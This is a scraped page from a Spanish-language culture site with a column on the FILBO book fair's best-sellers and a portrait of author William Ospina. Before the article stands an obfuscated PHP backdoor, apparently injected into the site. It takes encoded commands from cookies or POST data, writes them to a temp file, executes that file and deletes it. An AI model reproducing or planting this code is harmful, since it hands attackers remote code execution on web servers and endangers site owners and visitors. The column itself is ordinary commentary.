$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Los más vendidos. – www.interferencechannel.com

Los más vendidos.

Editor

Al cierre de la FILBO nos envían los organizadores (prensa) un mensaje de auto-felicitación en que se denominan la mejor FILBO de la historia. Eso está bien pero nunca se va a saber si es cierto o falso, sin embargo fue una feria interesante con bastante asistencia. A los que peor les fue –como es natural en la economía actual- es a las editoriales pequeñas y pequeños productores culturales. “Producción” que lindo nombre…al fin y al cabo es una feria.

En su auto- felicitación los organizadores nos cuentan con orgullo que el libro más vendido fue “Salvando vidas” de José Fernández…

Quiero hablar de cosas importantes, interesante los dos autores colombianos más vendidos: Carolina Andújar (primero las damas) y William Ospina con su último libro Pa que se acabe la vaina disponible en su Carulla más cercano.  Como  no he leído a Carolina ni pienso leerla voy a hablar de William, habíamos tomado café hace un tiempo pero en aquella ocasión no hablamos de literatura sino muy someramente…hablamos más de Petro.  William es un personaje romántico, un hombre con fe en la vida y el ser humano, de eso no hay dudas. A pesar de ser uno de los autores más vendidos y con un reconocimiento moral de la comunidad que solo comparte con Fernando Vallejo, no es un tipo de fiestas ni homenajes, es un tipo serio para quien la literatura es algo importante…solo lo vi una vez en la feria, sin séquito ni parafernalia, va tranquilo y sin afán meditando una y otra vez sus visiones y sus proyectos.

Posee una soledad interesante, es un hombre que como diría Ibsen “se basta a sí mismo”. Él es consciente de lo que sucede a su alrededor, conoce desde dentro ese mundo de autores, actores, editores, comentaristas y árbitros. Sin embargo no le interesa…su interés está en otras cosas. Hace sus viajes a un lugar y a otro, persiguiendo una historia  y otra. Sus intereses son variados como traducir los sonetos de Shakespeare o deslumbrarse con el poema de Juan de Castellanos. Solo pienso que en tiempos donde los autores y artistas son convertidos en productos que llevan de feria en feria hay que poner un ojo en autores como él que se distancian, toman su tiempo, piensan lo necesario y por último deciden que decir.♣

Diego Aretz

Director Interference Channel

Comments are closed.